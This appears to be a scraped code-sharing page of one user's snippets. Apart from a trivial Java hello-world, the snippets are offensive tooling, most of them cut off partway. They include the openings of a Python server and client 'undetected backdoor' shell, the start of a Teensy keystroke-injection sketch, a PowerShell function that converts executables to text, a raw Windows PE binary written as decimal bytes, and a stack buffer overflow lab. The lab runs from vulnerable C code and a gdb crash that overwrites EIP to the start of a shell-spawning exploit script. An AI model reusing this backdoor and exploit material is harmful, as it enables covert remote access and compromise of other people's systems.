un4ckn0wl3z

public class Hello {
	public static void main(String[] args) {
		System.out.println("--------------------------------------");
		System.out.println("------------------HELLO---------------");
		System.out.println("--------------------------------------");
	}
}

un4ckn0wl3z

#!/usr/bin/python
# Server-Shell
# Author: N4N0-GH05TL1N3 && H2O
import socket #import socket
import os
print """
 =====================
       GRuBD00R
 =====================
 Undetected Backboor

un4ckn0wl3z

#!/usr/bin/python
# Grab Client-Shell
# Author: N4N0-GH05TL1N3 && H2O

import socket #import socket
import subprocess #to start shell in the system
import os
import time
import random

un4ckn0wl3z

#define TEENSY3
#ifdef TEENSY2
#include<usb_private.h>
#endif

void setup()
{
  delay(5000); //Delay required for OS to connect the device properly
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); //Tell Teensy to press Windows key
  Keyboard.set_key1(KEY_R); //Tell Teensy to press R

un4ckn0wl3z

function ExetoText
{
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $EXE, 
        
        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $Filename = "$pwd\ConvertedText.txt"

un4ckn0wl3z

77 90 80 0 2 0 0 0 4 0 15 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 186 16 0 14 31 180 9 205 33 184 1 76 205 33 144 144 84 104 105 115 32 112 114 111 103 114 97 109 32 109 117 115 116 32 98 101 32 114 117 110 32 117 110 100 101 114 32 87 105 110 51 50 13 10 36 55 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 9 0 249 207 208 79 0 0 0 0 0 0 0 0 224 0 142 129 11 1 2 25 0 244 8 0 0 82 1 0 0 0 0 0 136 248 8 0 0 16 0 0 0 16 9 0 0 0 64 0 0 16 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 32 11 0 0 4 0 0 0 0 0 0 2 0 0 0 0 0 16 0 0 64 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 208 9 0 64 65 0 0 0 208 10 0 216 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 10 0 220 138 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 

un4ckn0wl3z

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
        /* [1] */ char buf[256];
        /* [2] */ strcpy(buf,argv[1]);
        /* [3] */ printf("Input:%s\n",buf);
        return 0;
}

un4ckn0wl3z

(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
   0x08048414 <+0>:	push   ebp
   0x08048415 <+1>:	mov    ebp,esp
   0x08048417 <+3>:	and    esp,0xfffffff0
   0x0804841a <+6>:	sub    esp,0x110
   0x08048420 <+12>:	mov    eax,DWORD PTR [ebp+0xc]
   0x08048423 <+15>:	add    eax,0x4
   0x08048426 <+18>:	mov    eax,DWORD PTR [eax]

un4ckn0wl3z

(gdb) r `python -c 'print "A"*300'`
Starting program: /home/un4-5/BOFx86/Level-1/Classic_Stack_Based_Buffer_Overflow/vuln `python -c 'print "A"*300'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb) 

un4ckn0wl3z

#exp.py 
#!/usr/bin/env python
import struct
from subprocess import call

#Stack address where shellcode is copied.
ret_addr = 0xbffff1d0       
              
#Spawn a shell
#execve(/bin/sh)